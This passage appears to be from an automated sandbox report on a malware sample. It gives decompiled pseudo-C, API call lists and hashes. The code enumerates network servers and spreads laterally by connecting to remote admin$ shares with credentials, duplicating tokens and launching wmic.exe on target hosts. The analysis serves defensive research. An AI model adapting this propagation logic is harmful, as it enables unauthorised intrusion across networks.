                                                                                                                                                                                        							if( *((intOrPtr*)(_t43 - 4)) == 0x1f4 && ( *(_t43 + 4) & 0x0000000f) > 4) {
                                                                                                                                                                                        								_t44 = 0;
                                                                                                                                                                                        								E007B6B95( *_t43, 0, _a4);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							E007B751B(_a4, 3,  *_t43);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t43 = _t43 + 0x18;
                                                                                                                                                                                        						_t40 = _t40 + 1;
                                                                                                                                                                                        						if(_t40 < _v12) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_a12 = 0;
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					if(_v8 != _t44) {
                                                                                                                                                                                        						NetApiBufferFree(_v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L16:
                                                                                                                                                                                        					return _a12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 007B754C
                                                                                                                                                                                        • NetApiBufferFree.NETAPI32(?), ref: 007B75C9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BufferEnumFreeServer
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2429717511-0
                                                                                                                                                                                        • Opcode ID: 8918e72fd67e2dc317c84aee11413f25d1281a901cf5fff900dca58397db3230
                                                                                                                                                                                        • Instruction ID: 80975d87c4db1ae5107797cca8db16774abc027dc13e3da0d837f4fbedd7f728
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8918e72fd67e2dc317c84aee11413f25d1281a901cf5fff900dca58397db3230
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F215EB6904219EBDB35DF94CC44BEEBB79FF84710F208516F811A6150E3799B60DBA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                        			E007B7DD0(void* __ecx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                                        				void** _t19;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                        				signed int* _t23;
                                                                                                                                                                                        				signed int* _t24;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                        				signed int _t32;
                                                                                                                                                                                        				signed int* _t35;
                                                                                                                                                                                        				signed int* _t36;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t17 = E007B6477();
                                                                                                                                                                                        				_t39 = _t17;
                                                                                                                                                                                        				_t19 =  &_v8;
                                                                                                                                                                                        				asm("sbb esi, esi");
                                                                                                                                                                                        				_t27 = 0;
                                                                                                                                                                                        				_t2 = _t39 - 0x1e; // -30
                                                                                                                                                                                        				_t42 = _t41 & _t2;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				__imp__NetServerGetInfo(0, 0x65, _t19, 0x1e, _t38, _t41, _t26, __ecx); // executed
                                                                                                                                                                                        				_t20 = _v8;
                                                                                                                                                                                        				if(_t19 == 0 && ( *(_t20 + 0x10) & 0x00000018) != 0) {
                                                                                                                                                                                        					_t27 = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                        					NetApiBufferFree(_t20);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                                        					_t39 = _t39 + 0xf;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t31 = 3;
                                                                                                                                                                                        				_t22 = _t39 / _t31;
                                                                                                                                                                                        				_t32 = 0xf;
                                                                                                                                                                                        				if(_t39 <= 0x1e) {
                                                                                                                                                                                        					_t12 = _t39 - 0xf; // -30
                                                                                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                                                                                        					_t32 = _t32 & _t12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t39 > 0xf) {
                                                                                                                                                                                        					_t39 = 0xf;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t35 = _a4;
                                                                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                                                                        					 *_t35 = _t42;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t36 = _a12;
                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                        					 *_t36 = _t22;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t23 = _a16;
                                                                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                                                                        					 *_t23 = _t32;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t24 = _a8;
                                                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                                                        					 *_t24 = _t39;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                        			}





















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477
                                                                                                                                                                                        • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,007B7AA3,?,?,000000FF,?,?), ref: 007B7DF6
                                                                                                                                                                                        • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,007B7AA3,?,?,000000FF,?,?), ref: 007B7E0F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BufferCountFreeInfoServerTick
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2934114180-0
                                                                                                                                                                                        • Opcode ID: 03441cde66ce682ecfe5e1b5f401b5ce0bb17366bb4e429bbdcbc895ab711d35
                                                                                                                                                                                        • Instruction ID: 4381ae94e227670b3ffd3ce8e8f6bce73254fa13c1b792f1fcf4732d8c900997
                                                                                                                                                                                        • Opcode Fuzzy Hash: 03441cde66ce682ecfe5e1b5f401b5ce0bb17366bb4e429bbdcbc895ab711d35
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2911B6727042099FE729CE69D885FEE77AAAFC0B10F1981A9E505CB180E778DD00D750
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B6DA4(signed int __eax, void* __ecx, struct _CRITICAL_SECTION* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                        				signed int _t43;
                                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                        				struct _CRITICAL_SECTION* _t56;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t56 = __esi;
                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        				_t43 = __eax;
                                                                                                                                                                                        				if(__esi == 0) {
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				EnterCriticalSection(__esi);
                                                                                                                                                                                        				_t54 = _t43;
                                                                                                                                                                                        				if(_t43 >=  *((intOrPtr*)(__esi + 0x24)) + _t43) {
                                                                                                                                                                                        					L7:
                                                                                                                                                                                        					LeaveCriticalSection(_t56);
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					L2:
                                                                                                                                                                                        					_t35 =  *((intOrPtr*)(_t56 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4)))), _a4,  *((intOrPtr*)(_t56 + 0x1c)));
                                                                                                                                                                                        					_v8 = _t35;
                                                                                                                                                                                        					if(_t35 != 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t54 = _t54 + 1;
                                                                                                                                                                                        					if(_t54 <  *(_t56 + 0x24) + _t43) {
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t48 = _a8;
                                                                                                                                                                                        				if(_t48 != 0) {
                                                                                                                                                                                        					 *_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4));
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6DB5
                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6E0C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                        • Opcode ID: 034a4d50dc70ac34ec6fbcbd95db1e8bb9d5000e4af862f4c4eb02b6cade362c
                                                                                                                                                                                        • Instruction ID: 858142f7a8304837146d8e76cf63c68ce68c12ec7abbc44b195c2a9899f65395
                                                                                                                                                                                        • Opcode Fuzzy Hash: 034a4d50dc70ac34ec6fbcbd95db1e8bb9d5000e4af862f4c4eb02b6cade362c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 07116939700A059FCB25CF6AC880A9AB7E7FF993047054129E946C7311EB39ED128F94
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E007B6AA8(WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                        				signed int _t6;
                                                                                                                                                                                        
                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t6 = StrCmpIW(_a4, _a8); // executed
                                                                                                                                                                                        					asm("sbb eax, eax");
                                                                                                                                                                                        					return  ~_t6 + 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                        • StrCmpIW.KERNELBASE(00000000,?), ref: 007B6ABD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: ac50d7010277fc825519eb4936cf36d937557ea67c081d6560bd82a2dd7c78a3
                                                                                                                                                                                        • Instruction ID: 17f66cdaaaab812d84aeb037726ca3f1fcfbee9b2147917bde41d7e60d54b276
                                                                                                                                                                                        • Opcode Fuzzy Hash: ac50d7010277fc825519eb4936cf36d937557ea67c081d6560bd82a2dd7c78a3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BD05231154209EECF259E64CC08BF83BA8AB1031AF08C020BA0A941A0D27D8AA8DA80
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007BC493(signed int _a8, signed int _a12) {
                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t5 = malloc(_a8 * _a12); // executed
                                                                                                                                                                                        				return _t5;
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                                                        • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                                                                                                        • Instruction ID: ec8c23033456a1fe1ff62cabf26932a72bafa010f8e8f333c1f5c42a773456ca
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 55B0123311830DBB8F04FED8E987C9A73DCEEA4620B404406F91C8F141E935F7204669
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                        			E007B9B63(long _a4, short* _a8, short* _a12, signed int _a16) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                        				void* _v56;
                                                                                                                                                                                        				void* _v60;
                                                                                                                                                                                        				short _v68;
                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                        				void _v112;
                                                                                                                                                                                        				char _v116;
                                                                                                                                                                                        				short* _v128;
                                                                                                                                                                                        				void _v144;
                                                                                                                                                                                        				struct _NETRESOURCE _v148;
                                                                                                                                                                                        				short _v668;
                                                                                                                                                                                        				char _v1188;
                                                                                                                                                                                        				short _v2748;
                                                                                                                                                                                        				short _v4796;
                                                                                                                                                                                        				short _v6844;
                                                                                                                                                                                        				short _v8892;
                                                                                                                                                                                        				short _v74428;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                        				WCHAR* _t130;
                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                        				int _t144;
                                                                                                                                                                                        				int _t150;
                                                                                                                                                                                        				long _t151;
                                                                                                                                                                                        				signed int _t163;
                                                                                                                                                                                        				int _t168;
                                                                                                                                                                                        				signed int _t173;
                                                                                                                                                                                        				long _t184;
                                                                                                                                                                                        				WCHAR* _t187;
                                                                                                                                                                                        				int _t189;
                                                                                                                                                                                        				signed int _t192;
                                                                                                                                                                                        				int _t199;
                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                        
                                                                                                                                                                                        				E007BA760(0x122bc);
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                                        					_v8 = 0x57;
                                                                                                                                                                                        					L51:
                                                                                                                                                                                        					_t112 = _a16;
                                                                                                                                                                                        					__eflags = _t112;
                                                                                                                                                                                        					if(_t112 != 0) {
                                                                                                                                                                                        						 *_t112 = _v24;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					SetLastError(_v8);
                                                                                                                                                                                        					return _v16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v668 = 0;
                                                                                                                                                                                        				wsprintfW( &_v668, L"\\\\%s\\admin$", _a4);
                                                                                                                                                                                        				_v148 = 0;
                                                                                                                                                                                        				_t192 = 7;
                                                                                                                                                                                        				memset( &_v144, 0, _t192 << 2);
                                                                                                                                                                                        				_v128 =  &_v668;
                                                                                                                                                                                        				_t199 = 1;
                                                                                                                                                                                        				_v144 = 1;
                                                                                                                                                                                        				E007B88D3( &_v1188);
                                                                                                                                                                                        				_t187 = L"\\\\%ws\\admin$\\%ws";
                                                                                                                                                                                        				wsprintfW( &_v6844, _t187, _a4,  &_v1188);
                                                                                                                                                                                        				_v4796 = 0;
                                                                                                                                                                                        				_v8892 = 0;
                                                                                                                                                                                        				wsprintfW( &_v4796, _t187, _a4,  &_v1188);
                                                                                                                                                                                        				_t130 = PathFindExtensionW( &_v4796);
                                                                                                                                                                                        				if(_t130 != 0) {
                                                                                                                                                                                        					 *_t130 = 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				wsprintfW( &_v8892, _t187, _a4, L"cscc.dat");
                                                                                                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_v24 = WNetAddConnection2W( &_v148, _a12, _a8, 0);
                                                                                                                                                                                        					if(PathFileExistsW( &_v8892) != 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v8 = GetLastError();
                                                                                                                                                                                        					_t141 = E007B87E7( *0x7c7b94,  &_v6844,  *0x7c3984);
                                                                                                                                                                                        					_t189 = 0;
                                                                                                                                                                                        					if(_t141 != 0) {
                                                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                                                        						if(_a8 != 0) {
                                                                                                                                                                                        							__eflags = _a12;
                                                                                                                                                                                        							if(_a12 != 0) {
                                                                                                                                                                                        								E007B68B5(_a8, _a12);
                                                                                                                                                                                        								 *0x7c3010 = _t199;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v20 = _t189;
                                                                                                                                                                                        						_v12 = _t189;
                                                                                                                                                                                        						_t144 = OpenThreadToken(GetCurrentThread(), 2, _t199,  &_v20);
                                                                                                                                                                                        						__eflags = _t144;
                                                                                                                                                                                        						if(_t144 != 0) {
                                                                                                                                                                                        							DuplicateTokenEx(_v20, 0x2000000, _t189, 2, _t199,  &_v12);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v74428 = 0;
                                                                                                                                                                                        						_v2748 = 0;
                                                                                                                                                                                        						_v44 = _t189;
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						memset( &_v112, _t189, 0x40);
                                                                                                                                                                                        						_v68 = 0;
                                                                                                                                                                                        						_v116 = 0x44;
                                                                                                                                                                                        						_v72 = 1;
                                                                                                                                                                                        						_t150 = GetSystemDirectoryW( &_v2748, 0x104);
                                                                                                                                                                                        						__eflags = _t150;
                                                                                                                                                                                        						if(_t150 == 0) {
                                                                                                                                                                                        							_t151 = GetLastError();
                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							PathAppendW( &_v2748, L"wbem\\wmic.exe");
                                                                                                                                                                                        							__eflags = PathFileExistsW( &_v2748);
                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                        								L41:
                                                                                                                                                                                        								DeleteFileW( &_v6844);
                                                                                                                                                                                        								L43:
                                                                                                                                                                                        								__eflags = _v12 - _t189;
                                                                                                                                                                                        								if(_v12 != _t189) {
                                                                                                                                                                                        									CloseHandle(_v12);
                                                                                                                                                                                        									_v12 = _t189;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								__eflags = _v20 - _t189;
                                                                                                                                                                                        								if(_v20 != _t189) {
                                                                                                                                                                                        									CloseHandle(_v20);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t199 = 1;
                                                                                                                                                                                        								__eflags = 1;
                                                                                                                                                                                        								L48:
                                                                                                                                                                                        								__eflags = _v24;
                                                                                                                                                                                        								if(_v24 == 0) {
                                                                                                                                                                                        									WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L51;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t163 = E007B9972(_t205 + wsprintfW( &_v74428, L"%ws ",  &_v2748) * 2 - 0x122b8, __eflags, _a4, _a8, _a12);
                                                                                                                                                                                        							__eflags = _t163;
                                                                                                                                                                                        							if(_t163 == 0) {
                                                                                                                                                                                        								L37:
                                                                                                                                                                                        								_t151 = GetLastError();
                                                                                                                                                                                        								_t189 = 0;
                                                                                                                                                                                        								L39:
                                                                                                                                                                                        								_v8 = _t151;
                                                                                                                                                                                        								L40:
                                                                                                                                                                                        								__eflags = _v16 - _t189;
                                                                                                                                                                                        								if(_v16 != _t189) {
                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L41;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_push( &_v44);
                                                                                                                                                                                        							_push( &_v116);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push(0x8000000);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push( &_v74428);
                                                                                                                                                                                        							_push( &_v2748);
                                                                                                                                                                                        							__eflags = _v12;
                                                                                                                                                                                        							if(_v12 == 0) {
                                                                                                                                                                                        								_t168 = CreateProcessW();
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t168 = CreateProcessAsUserW(_v12, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags = _t168;
                                                                                                                                                                                        							if(_t168 == 0) {
                                                                                                                                                                                        								goto L37;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								WaitForSingleObject(_v44, 0xffffffff);
                                                                                                                                                                                        								_a4 = 0;
                                                                                                                                                                                        								GetExitCodeProcess(_v44,  &_a4);
                                                                                                                                                                                        								__eflags = _v52;
                                                                                                                                                                                        								if(_v52 != 0) {
                                                                                                                                                                                        									CloseHandle(_v52);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								__eflags = _v60;
                                                                                                                                                                                        								if(_v60 != 0) {
                                                                                                                                                                                        									CloseHandle(_v60);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								__eflags = _v56;
                                                                                                                                                                                        								if(_v56 != 0) {
                                                                                                                                                                                        									CloseHandle(_v56);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								__eflags = _v40;
                                                                                                                                                                                        								if(_v40 != 0) {
                                                                                                                                                                                        									CloseHandle(_v40);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								__eflags = _v44;
                                                                                                                                                                                        								if(_v44 != 0) {
                                                                                                                                                                                        									CloseHandle(_v44);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								__eflags = _a4;
                                                                                                                                                                                        								_t173 = 0 | _a4 == 0x00000000;
                                                                                                                                                                                        								_v16 = _t173;
                                                                                                                                                                                        								__eflags = _t173;
                                                                                                                                                                                        								if(_t173 != 0) {
                                                                                                                                                                                        									_t189 = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_v16 = PathFileExistsW( &_v4796);
                                                                                                                                                                                        									_t189 = 0;
                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t184 = GetLastError();
                                                                                                                                                                                        					_v8 = _t184;
                                                                                                                                                                                        					if(_t184 == 0x50 || _t184 == 0x35 || _t184 == 0x43 || _v24 != 0x4c3) {
                                                                                                                                                                                        						goto L48;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						if(_v28 != 0) {
                                                                                                                                                                                        							goto L51;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                                                                                                        						_v28 = _t199;
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v16 = _t199;
                                                                                                                                                                                        				goto L48;
                                                                                                                                                                                        			}

                                                                                                                                                                                        0x007b9ea2
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9ea2
                                                                                                                                                                                        0x007b9e90
                                                                                                                                                                                        0x007b9e34
                                                                                                                                                                                        0x007b9d98
                                                                                                                                                                                        0x007b9c9a
                                                                                                                                                                                        0x007b9ca0
                                                                                                                                                                                        0x007b9ca6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9ccb
                                                                                                                                                                                        0x007b9cce
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9cdd
                                                                                                                                                                                        0x007b9ce3
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9ce3
                                                                                                                                                                                        0x007b9ca6
                                                                                                                                                                                        0x007b9ceb
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9BA5
                                                                                                                                                                                          • Part of subcall function 007B88D3: PathFindFileNameW.SHLWAPI(007C7BC8,76B5C0B0,?,007B95B2), ref: 007B88E3
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9BF2
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9C16
                                                                                                                                                                                        • PathFindExtensionW.SHLWAPI(?), ref: 007B9C22
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9C41
                                                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007B9C59
                                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 007B9C69
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B9C73
                                                                                                                                                                                        • GetLastError.KERNEL32(?), ref: 007B9C9A
                                                                                                                                                                                        • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B9CDD
                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 007B9D1B
                                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 007B9D22
                                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 007B9D3C
                                                                                                                                                                                        • memset.MSVCRT ref: 007B9D62
